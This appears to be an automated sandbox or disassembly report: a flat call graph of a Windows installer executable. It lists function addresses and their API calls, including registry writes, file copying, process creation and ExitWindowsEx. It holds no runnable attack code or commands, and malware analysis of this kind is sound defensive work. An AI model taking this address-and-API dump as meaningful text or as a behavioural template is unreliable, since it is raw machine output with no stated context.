401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 